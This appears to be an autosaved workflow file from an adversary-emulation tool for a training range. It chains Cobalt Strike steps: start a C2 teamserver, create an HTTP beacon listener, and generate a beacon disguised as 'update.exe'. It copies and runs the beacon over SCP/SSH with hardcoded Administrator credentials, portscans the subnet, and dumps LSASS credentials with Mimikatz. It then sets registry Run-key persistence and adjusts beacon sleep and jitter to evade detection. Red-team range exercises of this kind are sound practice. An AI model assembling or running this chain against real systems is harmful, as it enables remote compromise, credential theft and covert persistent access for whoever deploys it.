{
  "version": "1.0",
  "metadata": {
    "name": "_autosave",
    "description": "Auto-saved workflow",
    "author": "ditch",
    "created": "2026-04-17T14:49:37.121Z",
    "lastModified": "2026-04-17T14:49:37.121Z",
    "tags": [
      "autosave"
    ]
  },
  "globalSettings": {
    "executionPlanName": "SAQT 6",
    "targetNetwork": "Range 1",
    "sessionId": "session_01",
    "operator": "ditch",
    "redTeam": "",
    "notes": "",
    "c2Server": "10.50.100.5",
    "csUser": "operator",
    "csPass": "",
    "csDir": "/opt/cobaltstrike",
    "csPort": "50050",
    "workdir": "~/sandworm/",
    "debugMode": "${False}",
    "sudoNeeded": "${False}"
  },
  "nodes": [
    {
      "id": "cs-start-c2-1776435281412",
      "type": "opforNode",
      "position": {
        "x": -90,
        "y": 345
      },
      "data": {
        "definition": {
          "id": "cs-start-c2",
          "name": "Start C2 Server",
          "icon": "🏗️",
          "tactic": "TA0042",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Connect to Cobalt Strike teamserver and initialize C2 infrastructure",
          "riskLevel": "medium",
          "estimatedDuration": 30,
          "inputs": [
            {
              "id": "signal",
              "label": "Signal",
              "type": "signal",
              "required": false
            }
          ],
          "outputs": [
            {
              "id": "done",
              "label": "Complete",
              "type": "signal"
            }
          ],
          "parameters": [
            {
              "id": "csIp",
              "label": "CS IP",
              "type": "string",
              "required": true,
              "placeholder": "10.50.100.5",
              "default": "${CS_IP}"
            },
            {
              "id": "csUser",
              "label": "CS User",
              "type": "string",
              "required": true,
              "placeholder": "operator",
              "default": "${CS_USER}"
            },
            {
              "id": "csPass",
              "label": "CS Password",
              "type": "string",
              "required": true,
              "placeholder": "password",
              "default": "${CS_PASS}"
            },
            {
              "id": "csDir",
              "label": "CS Directory",
              "type": "string",
              "required": true,
              "placeholder": "/opt/cobaltstrike",
              "default": "${CS_DIR}"
            },
            {
              "id": "csPort",
              "label": "CS Port",
              "type": "number",
              "required": true,
              "placeholder": "50050",
              "default": "${CS_PORT}"
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": false,
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Start C2",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ],
            "libraryArgs": [
              {
                "globalSetting": "CS_USER",
                "paramName": "user",
                "position": 1
              },
              {
                "globalSetting": "CS_PASS",
                "paramName": "cs_password",
                "position": 2
              },
              {
                "globalSetting": "CS_DIR",
                "paramName": "cs_dir",
                "position": 3
              },
              {
                "globalSetting": "CS_PORT",
                "paramName": "port",
                "position": 4
              },
              {
                "globalSetting": "DEBUG_MODE",
                "paramName": "debug",
                "position": 5
              }
            ],
            "keywordArgs": [],
            "preKeywordLog": "=== Starting C2: ${CS_IP} ===",
            "documentation": "Start C2 team server",
            "tags": [
              "infrastructure",
              "c2"
            ]
          }
        },
        "parameters": {
          "csIp": "${CS_IP}",
          "csUser": "${CS_USER}",
          "csPass": "${CS_PASS}",
          "csDir": "${CS_DIR}",
          "csPort": "${CS_PORT}"
        },
        "label": "Start C2 Server",
        "validationState": "validated"
      },
      "measured": {
        "width": 160,
        "height": 101
      },
      "selected": false,
      "dragging": false
    },
    {
      "id": "cs-generate-payload-1776435285817",
      "type": "opforNode",
      "position": {
        "x": 315,
        "y": 345
      },
      "data": {
        "definition": {
          "id": "cs-generate-payload",
          "name": "Generate Payload",
          "icon": "🏗️",
          "tactic": "TA0042",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Generate a Cobalt Strike beacon payload using Create Payload with specified listener and template",
          "riskLevel": "medium",
          "estimatedDuration": 30,
          "inputs": [
            {
              "id": "listener_active",
              "label": "Listener Active",
              "type": "boolean",
              "required": true
            }
          ],
          "outputs": [
            {
              "id": "payload_ready",
              "label": "Payload Ready",
              "type": "boolean",
              "description": "Payload file generated and ready"
            }
          ],
          "parameters": [
            {
              "id": "payloadName",
              "label": "Payload Name",
              "type": "string",
              "required": true,
              "placeholder": "update",
              "default": "update"
            },
            {
              "id": "payloadTemplate",
              "label": "Template",
              "type": "select",
              "required": true,
              "options": [
                "exe",
                "dll",
                "powershell",
                "raw"
              ],
              "default": "exe"
            },
            {
              "id": "listenerName",
              "label": "Listener",
              "type": "string",
              "required": true,
              "placeholder": "HTTP",
              "default": "HTTP"
            },
            {
              "id": "outputDir",
              "label": "Output Dir",
              "type": "string",
              "required": true,
              "placeholder": "${WORKDIR}",
              "default": "${WORKDIR}"
            },
            {
              "id": "retries",
              "label": "Retries",
              "type": "number",
              "required": false,
              "placeholder": "5",
              "default": 5
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": true,
            "listeners": [
              "HTTP"
            ],
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Create Payload",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ],
            "keywordArgs": [
              {
                "param": "payloadName",
                "position": 1,
                "variableRef": true,
                "variableName": "HTTP_PAYLOAD_NAME"
              },
              {
                "param": "payloadTemplate",
                "position": 2,
                "variableRef": false
              },
              {
                "param": "listenerName",
                "position": 3,
                "variableRef": true,
                "variableName": "HTTP_LISTENER"
              },
              {
                "param": "outputDir",
                "position": 4,
                "variableRef": false
              },
              {
                "param": "retries",
                "position": 5,
                "variableRef": false
              }
            ],
            "variables": [
              {
                "name": "HTTP_PAYLOAD_NAME",
                "fromParam": "payloadName",
                "scope": "suite"
              }
            ],
            "captureOutput": "PAYLOAD_PATH",
            "postKeywordLog": "=== Payload Location: ${PAYLOAD_PATH} ===",
            "documentation": "Generate beacon payload",
            "tags": [
              "resource-development",
              "payload"
            ]
          }
        },
        "parameters": {
          "payloadName": "update",
          "payloadTemplate": "exe",
          "listenerName": "HTTP",
          "outputDir": "${WORKDIR}",
          "retries": 5
        },
        "label": "Generate Payload",
        "validationState": "validated"
      },
      "measured": {
        "width": 160,
        "height": 102
      },
      "selected": false,
      "dragging": false
    },
    {
      "id": "cs-create-listener-1776435286730",
      "type": "opforNode",
      "position": {
        "x": 120,
        "y": 255
      },
      "data": {
        "definition": {
          "id": "cs-create-listener",
          "name": "Create Listener",
          "icon": "🏗️",
          "tactic": "TA0042",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Create an HTTP, HTTPS, or SMB listener on the Cobalt Strike teamserver for beacon callbacks",
          "riskLevel": "medium",
          "estimatedDuration": 10,
          "inputs": [
            {
              "id": "signal",
              "label": "Signal",
              "type": "signal",
              "required": false
            }
          ],
          "outputs": [
            {
              "id": "done",
              "label": "Complete",
              "type": "signal"
            }
          ],
          "parameters": [
            {
              "id": "listenerName",
              "label": "Listener Name",
              "type": "string",
              "required": true,
              "placeholder": "HTTP",
              "default": "HTTP"
            },
            {
              "id": "listenerPort",
              "label": "Port",
              "type": "number",
              "required": true,
              "placeholder": "80",
              "default": 80
            },
            {
              "id": "listenerType",
              "label": "Listener Type",
              "type": "select",
              "required": true,
              "options": [
                "Beacon_HTTP",
                "Beacon_HTTPS"
              ],
              "default": "Beacon_HTTP"
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": true,
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Create Listener",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ],
            "keywordArgs": [
              {
                "param": "listenerName",
                "position": 1,
                "variableRef": true,
                "variableName": "HTTP_LISTENER"
              },
              {
                "param": "listenerPort",
                "position": 2,
                "variableRef": true,
                "variableName": "HTTP_LISTENER_PORT"
              },
              {
                "param": "listenerType",
                "position": 3,
                "variableRef": true,
                "variableName": "HTTP_LISTENER_TYPE"
              },
              {
                "globalSetting": "CS_IP",
                "position": 4
              }
            ],
            "variables": [
              {
                "name": "HTTP_LISTENER",
                "fromParam": "listenerName",
                "scope": "suite"
              },
              {
                "name": "HTTP_LISTENER_PORT",
                "fromParam": "listenerPort",
                "scope": "suite"
              },
              {
                "name": "HTTP_LISTENER_TYPE",
                "fromParam": "listenerType",
                "scope": "suite"
              }
            ],
            "preKeywordLog": "=== Creating Listener: ${HTTP_LISTENER} ===",
            "documentation": "Create scenario listeners",
            "tags": [
              "c2",
              "listener"
            ]
          }
        },
        "parameters": {
          "listenerName": "HTTP",
          "listenerPort": 80,
          "listenerType": "Beacon_HTTP"
        },
        "label": "Create Listener",
        "validationState": "validated"
      },
      "measured": {
        "width": 160,
        "height": 102
      },
      "selected": false,
      "dragging": false
    },
    {
      "id": "cs-initial-access-1776435302506",
      "type": "opforNode",
      "position": {
        "x": 555,
        "y": 270
      },
      "data": {
        "definition": {
          "id": "cs-initial-access",
          "name": "Initial Access via SCP/SSH",
          "icon": "🚪",
          "tactic": "TA0001",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Copy beacon payload to target via SCP then execute via SSH to establish initial foothold",
          "riskLevel": "medium",
          "estimatedDuration": 30,
          "inputs": [
            {
              "id": "payload_ready",
              "label": "Payload Ready",
              "type": "boolean",
              "required": true
            },
            {
              "id": "signal",
              "label": "Signal",
              "type": "signal",
              "required": false
            }
          ],
          "outputs": [
            {
              "id": "session",
              "label": "Initial Beacon",
              "type": "session",
              "description": "First beacon from target"
            }
          ],
          "parameters": [
            {
              "id": "targetIp",
              "label": "Target IP",
              "type": "string",
              "required": true,
              "placeholder": "172.16.2.5",
              "default": "172.16.2.5"
            },
            {
              "id": "targetUser",
              "label": "Target User",
              "type": "string",
              "required": true,
              "placeholder": "Administrator",
              "default": "Administrator"
            },
            {
              "id": "targetPass",
              "label": "Target Pass",
              "type": "string",
              "required": true,
              "placeholder": "P@ssw0rd",
              "default": "P@ssw0rd"
            },
            {
              "id": "targetPath",
              "label": "Target Drop Path",
              "type": "string",
              "required": false,
              "placeholder": "C:/Users/Administrator/Downloads",
              "default": "C:/Users/Administrator/Downloads"
            },
            {
              "id": "beaconWait",
              "label": "Beacon Wait (seconds)",
              "type": "number",
              "required": false,
              "placeholder": "15",
              "default": 15
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": true,
            "listeners": [
              "HTTP"
            ],
            "payloads": [
              "update"
            ],
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py",
              "SSHLibrary",
              "SCPLibrary"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Start Command",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py",
              "SSHLibrary",
              "SCPLibrary"
            ],
            "variables": [
              {
                "name": "TARGET1",
                "fromParam": "targetIp",
                "scope": "suite"
              },
              {
                "name": "TARGET1_USER",
                "fromParam": "targetUser",
                "scope": "suite"
              },
              {
                "name": "TARGET1_PASS",
                "fromParam": "targetPass",
                "scope": "suite"
              },
              {
                "name": "TARGET1_DROP_PATH",
                "fromParam": "targetPath",
                "default": "C:/Users/Administrator/Downloads",
                "scope": "suite"
              },
              {
                "name": "BEACON_WAIT",
                "fromParam": "beaconWait",
                "default": "15",
                "scope": "suite"
              }
            ],
            "preKeywordLog": "=== Initial Access → ${TARGET1} ===",
            "preKeywordStatements": [
              "${LOCAL_INITIAL_BEACON}=    Set Variable    ${WORKDIR}update.exe",
              "SCPLibrary.Open Connection    ${TARGET1}    username=${TARGET1_USER}    password=${TARGET1_PASS}",
              "SCPLibrary.Put File    ${LOCAL_INITIAL_BEACON}    ${TARGET1_DROP_PATH}/update.exe",
              "SCPLibrary.Close Connection",
              "Sleep    5s",
              "SSHLibrary.Open Connection    ${TARGET1}",
              "Login    ${TARGET1_USER}    ${TARGET1_PASS}",
              "Sleep    1s"
            ],
            "keywordArgs": [
              {
                "staticValue": "${TARGET1_DROP_PATH}\\\\update.exe",
                "position": 1
              }
            ],
            "postKeywordStatements": [
              "SSHLibrary.Close Connection",
              "Sleep    ${BEACON_WAIT}s",
              "@{_sessions}=    Get Sessions By IP    ${TARGET1}",
              "${CURRENT_SESSION}=    Set Variable    ${_sessions[0]}"
            ],
            "sessionVariable": "CURRENT_SESSION",
            "documentation": "SCP payload to target and execute via SSH",
            "tags": [
              "initial-access",
              "ssh"
            ]
          }
        },
        "parameters": {
          "targetIp": "172.16.2.5",
          "targetUser": "Administrator",
          "targetPass": "P@ssw0rd",
          "targetPath": "C:/Users/Administrator/Downloads",
          "beaconWait": 15
        },
        "label": "Initial Access via SCP/SSH",
        "validationState": "configured"
      },
      "measured": {
        "width": 160,
        "height": 102
      },
      "selected": false,
      "dragging": false
    },
    {
      "id": "cs-network-enumerate-1776435352798",
      "type": "opforNode",
      "position": {
        "x": 750,
        "y": 285
      },
      "data": {
        "definition": {
          "id": "cs-network-enumerate",
          "name": "Network Enumerate",
          "icon": "🔍",
          "tactic": "TA0007",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Run portscan on target subnet via beacon",
          "riskLevel": "medium",
          "estimatedDuration": 30,
          "inputs": [
            {
              "id": "session",
              "label": "Beacon Session",
              "type": "session",
              "required": true
            }
          ],
          "outputs": [
            {
              "id": "scan_results",
              "label": "Scan Results",
              "type": "string",
              "description": "Port scan output"
            }
          ],
          "parameters": [
            {
              "id": "session",
              "label": "Session",
              "type": "string",
              "required": true,
              "placeholder": "${CURRENT_SESSION}",
              "default": "${CURRENT_SESSION}"
            },
            {
              "id": "targetRange",
              "label": "Target Range",
              "type": "string",
              "required": true,
              "placeholder": "172.16.2.0/24",
              "default": "${TARGET_RANGE}"
            },
            {
              "id": "ports",
              "label": "Ports",
              "type": "string",
              "required": true,
              "placeholder": "445,5985,135",
              "default": "${TARGET_PORTS}"
            },
            {
              "id": "method",
              "label": "Method",
              "type": "select",
              "required": true,
              "options": [
                "icmp",
                "arp"
              ],
              "default": "icmp"
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": true,
            "listeners": [],
            "payloads": [],
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Network Enumerate",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ],
            "keywordArgs": [
              {
                "param": "session",
                "position": 1,
                "sessionVariable": "CURRENT_SESSION"
              },
              {
                "param": "targetRange",
                "position": 2,
                "variableRef": true,
                "variableName": "TARGET_RANGE"
              },
              {
                "param": "ports",
                "position": 3,
                "variableRef": true,
                "variableName": "TARGET_PORTS"
              },
              {
                "param": "method",
                "position": 4,
                "variableRef": true,
                "variableName": "SCAN_METHOD"
              }
            ],
            "variables": [
              {
                "name": "TARGET_RANGE",
                "fromParam": "targetRange",
                "default": "172.16.2.0/24",
                "scope": "suite"
              },
              {
                "name": "TARGET_PORTS",
                "fromParam": "ports",
                "default": "445,5985,135",
                "scope": "suite"
              },
              {
                "name": "SCAN_METHOD",
                "fromParam": "method",
                "default": "icmp",
                "scope": "suite"
              },
              {
                "name": "ARCH",
                "default": "x64",
                "scope": "suite"
              }
            ],
            "preKeywordLog": "=== Network Enumerate: ${TARGET_RANGE} ===",
            "documentation": "Portscan target range via beacon",
            "tags": [
              "discovery",
              "portscan"
            ]
          }
        },
        "parameters": {
          "session": "${CURRENT_SESSION}",
          "targetRange": "${TARGET_RANGE}",
          "ports": "${TARGET_PORTS}",
          "method": "icmp"
        },
        "label": "Network Enumerate",
        "validationState": "validated"
      },
      "measured": {
        "width": 160,
        "height": 101
      },
      "selected": false,
      "dragging": false
    },
    {
      "id": "cs-dump-credentials-1776435357179",
      "type": "opforNode",
      "position": {
        "x": 960,
        "y": 330
      },
      "data": {
        "definition": {
          "id": "cs-dump-credentials",
          "name": "Dump Credentials",
          "icon": "🔑",
          "tactic": "TA0006",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Dump credentials from LSASS memory using Mimikatz via Cobalt Strike beacon",
          "riskLevel": "medium",
          "estimatedDuration": 15,
          "inputs": [
            {
              "id": "session",
              "label": "Beacon Session",
              "type": "session",
              "required": true
            }
          ],
          "outputs": [
            {
              "id": "creds",
              "label": "Credentials",
              "type": "string",
              "description": "Dumped credential data"
            }
          ],
          "parameters": [
            {
              "id": "session",
              "label": "Session",
              "type": "string",
              "required": true,
              "placeholder": "${CURRENT_SESSION}",
              "default": "${CURRENT_SESSION}"
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": true,
            "elevated": true,
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Run Mimikatz",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ],
            "keywordArgs": [
              {
                "param": "session",
                "position": 1,
                "sessionVariable": "CURRENT_SESSION"
              }
            ],
            "captureOutput": "CRED_DUMP_RESULT",
            "preKeywordLog": "=== Dumping Credentials (Mimikatz) ===",
            "postKeywordLog": "=== Credential Dump Complete ===",
            "documentation": "Dump credentials via Mimikatz",
            "tags": [
              "credential-access",
              "mimikatz"
            ]
          }
        },
        "parameters": {
          "session": "${CURRENT_SESSION}"
        },
        "label": "Dump Credentials",
        "validationState": "validated"
      },
      "measured": {
        "width": 160,
        "height": 101
      },
      "selected": false,
      "dragging": false
    },
    {
      "id": "cs-persistence-registry-1776435370204",
      "type": "opforNode",
      "position": {
        "x": 1170,
        "y": 270
      },
      "data": {
        "definition": {
          "id": "cs-persistence-registry",
          "name": "Persistence via Registry",
          "icon": "🔒",
          "tactic": "TA0003",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Establish persistence via registry run key",
          "riskLevel": "medium",
          "estimatedDuration": 10,
          "inputs": [
            {
              "id": "session",
              "label": "Beacon Session",
              "type": "session",
              "required": true
            }
          ],
          "outputs": [
            {
              "id": "persisted",
              "label": "Persisted",
              "type": "boolean",
              "description": "Persistence established"
            }
          ],
          "parameters": [
            {
              "id": "session",
              "label": "Session",
              "type": "string",
              "required": true,
              "placeholder": "${CURRENT_SESSION}",
              "default": "${CURRENT_SESSION}"
            },
            {
              "id": "beaconPath",
              "label": "Beacon Path",
              "type": "string",
              "required": true,
              "placeholder": "C:\\Users\\Public\\update.exe",
              "default": "C:\\Users\\Public\\update.exe"
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": true,
            "listeners": [],
            "payloads": [],
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Persistence (Registry)",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ],
            "keywordArgs": [
              {
                "param": "session",
                "position": 1,
                "sessionVariable": "CURRENT_SESSION"
              },
              {
                "param": "beaconPath",
                "position": 2,
                "variableRef": false
              }
            ],
            "variables": [
              {
                "name": "APPDATA_PATH",
                "default": "AppData\\\\Local\\\\Temp",
                "scope": "suite"
              },
              {
                "name": "RUN_KEY",
                "default": "HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
                "scope": "suite"
              }
            ],
            "preKeywordLog": "=== Setting Registry Persistence: ${RUN_KEY} ===",
            "postKeywordLog": "=== Registry Persistence Set ===",
            "documentation": "Persist beacon via registry run key",
            "tags": [
              "persistence",
              "registry"
            ]
          }
        },
        "parameters": {
          "session": "${CURRENT_SESSION}",
          "beaconPath": "C:\\Users\\Public\\update.exe"
        },
        "label": "Persistence via Registry",
        "validationState": "validated"
      },
      "measured": {
        "width": 160,
        "height": 101
      },
      "selected": false,
      "dragging": false
    },
    {
      "id": "cs-session-sleep-1776435380872",
      "type": "opforNode",
      "position": {
        "x": 1395,
        "y": 225
      },
      "data": {
        "definition": {
          "id": "cs-session-sleep",
          "name": "Session Sleep",
          "icon": "📡",
          "tactic": "TA0011",
          "category": "Cobalt Strike",
          "subcategory": "",
          "description": "Set beacon sleep timer and jitter percentage to control callback frequency and evade detection",
          "riskLevel": "medium",
          "estimatedDuration": 5,
          "inputs": [
            {
              "id": "session",
              "label": "Beacon Session",
              "type": "session",
              "required": true
            }
          ],
          "outputs": [
            {
              "id": "session",
              "label": "Beacon Session",
              "type": "session",
              "description": "Session with updated sleep"
            }
          ],
          "parameters": [
            {
              "id": "sleepTime",
              "label": "Sleep Time (seconds)",
              "type": "number",
              "required": true,
              "placeholder": "60",
              "default": 60
            },
            {
              "id": "jitter",
              "label": "Jitter %",
              "type": "number",
              "required": false,
              "placeholder": "20",
              "default": 20
            }
          ],
          "executionType": "cobalt_strike",
          "requirements": {
            "c2Server": true,
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ]
          },
          "isCustom": false,
          "robotFramework": {
            "keyword": "Session Sleep",
            "libraries": [
              "cobaltstrikec2/cobaltstrike.py"
            ],
            "variables": [
              {
                "name": "CURRENT_SESSION",
                "default": "0",
                "scope": "suite"
              },
              {
                "name": "SLEEP_TIME",
                "fromParam": "sleepTime",
                "default": "60",
                "scope": "suite"
              },
              {
                "name": "JITTER",
                "fromParam": "jitter",
                "default": "20",
                "scope": "suite"
              }
            ],
            "keywordArgs": [
              {
                "param": "session",
                "position": 1,
                "sessionVariable": "CURRENT_SESSION"
              },
              {
                "param": "sleepTime",
                "position": 2,
                "variableRef": true,
                "variableName": "SLEEP_TIME"
              },
              {
                "param": "jitter",
                "position": 3,
                "variableRef": true,
                "variableName": "JITTER"
              }
            ],
            "documentation": "Set beacon sleep and jitter",
            "tags": [
              "c2",
              "evasion"
            ]
          }
        },
        "parameters": {
          "sleepTime": 60,
          "jitter": 20
        },
        "label": "Session Sleep",
        "validationState": "validated"
      },
      "measured": {
        "width": 160,
        "height": 101
      },
      "selected": true,
      "dragging": false
    }
  ],
  "edges": [
    {
      "source": "cs-start-c2-1776435281412",
      "sourceHandle": "done",
      "target": "cs-create-listener-1776435286730",
      "targetHandle": "signal",
      "animated": true,
      "style": {
        "stroke": "hsl(210, 100%, 50%)",
        "strokeWidth": 2
      },
      "id": "xy-edge__cs-start-c2-1776435281412done-cs-create-listener-1776435286730signal"
    },
    {
      "source": "cs-create-listener-1776435286730",
      "sourceHandle": "done",
      "target": "cs-generate-payload-1776435285817",
      "targetHandle": "listener_active",
      "animated": true,
      "style": {
        "stroke": "hsl(210, 100%, 50%)",
        "strokeWidth": 2
      },
      "id": "xy-edge__cs-create-listener-1776435286730done-cs-generate-payload-1776435285817listener_active"
    },
    {
      "source": "cs-generate-payload-1776435285817",
      "sourceHandle": "payload_ready",
      "target": "cs-initial-access-1776435302506",
      "targetHandle": "signal",
      "animated": true,
      "style": {
        "stroke": "hsl(210, 100%, 50%)",
        "strokeWidth": 2
      },
      "id": "xy-edge__cs-generate-payload-1776435285817payload_ready-cs-initial-access-1776435302506signal"
    },
    {
      "source": "cs-initial-access-1776435302506",
      "sourceHandle": "session",
      "target": "cs-network-enumerate-1776435352798",
      "targetHandle": "session",
      "animated": true,
      "style": {
        "stroke": "hsl(210, 100%, 50%)",
        "strokeWidth": 2
      },
      "id": "xy-edge__cs-initial-access-1776435302506session-cs-network-enumerate-1776435352798session"
    },
    {
      "source": "cs-network-enumerate-1776435352798",
      "sourceHandle": "scan_results",
      "target": "cs-dump-credentials-1776435357179",
      "targetHandle": "session",
      "animated": true,
      "style": {
        "stroke": "hsl(210, 100%, 50%)",
        "strokeWidth": 2
      },
      "id": "xy-edge__cs-network-enumerate-1776435352798scan_results-cs-dump-credentials-1776435357179session"
    },
    {
      "source": "cs-dump-credentials-1776435357179",
      "sourceHandle": "creds",
      "target": "cs-persistence-registry-1776435370204",
      "targetHandle": "session",
      "animated": true,
      "style": {
        "stroke": "hsl(210, 100%, 50%)",
        "strokeWidth": 2
      },
      "id": "xy-edge__cs-dump-credentials-1776435357179creds-cs-persistence-registry-1776435370204session"
    },
    {
      "source": "cs-persistence-registry-1776435370204",
      "sourceHandle": "persisted",
      "target": "cs-session-sleep-1776435380872",
      "targetHandle": "session",
      "animated": true,
      "style": {
        "stroke": "hsl(210, 100%, 50%)",
        "strokeWidth": 2
      },
      "id": "xy-edge__cs-persistence-registry-1776435370204persisted-cs-session-sleep-1776435380872session"
    }
  ],
  "viewport": {
    "x": -67.86342026766147,
    "y": 11.664453600903073,
    "zoom": 0.6531230940757655
  }
}